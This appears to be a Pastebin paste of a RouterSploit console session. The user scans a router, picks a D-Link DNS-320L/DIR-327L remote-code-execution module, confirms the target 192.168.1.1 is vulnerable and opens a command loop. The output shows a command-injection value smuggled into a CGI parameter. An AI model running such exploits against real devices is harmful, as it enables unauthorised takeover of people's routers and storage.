Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+] Device is vulnerable!
- - exploits/dlink/dwr_932_info_disclosure
- - exploits/dlink/dns_320l_327l_rce
- - exploits/asmax/ar_804_gu_rce
- rsf (AutoPwn) > use exploits/dlink/dns_320l_327l_rce
- rsf (D-LINK DNS-320L & DIR-327L RCE) > set target 192.168.1.1
- [+] {'target': '192.168.1.1'}
- rsf (D-LINK DNS-320L & DIR-327L RCE) > check
- [+] Target is vulnerable
- rsf (D-LINK DNS-320L & DIR-327L RCE) > run
- [*] Running module...
- [+] Target is vulnerable
- [*] Invoking command loop...
- cmd > ?
- <HTML><HEAD><script>location.href='/cloud_sync.asp?flag=cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;?;echo%20
Advertisement
Add Comment
Please, Sign In to add comment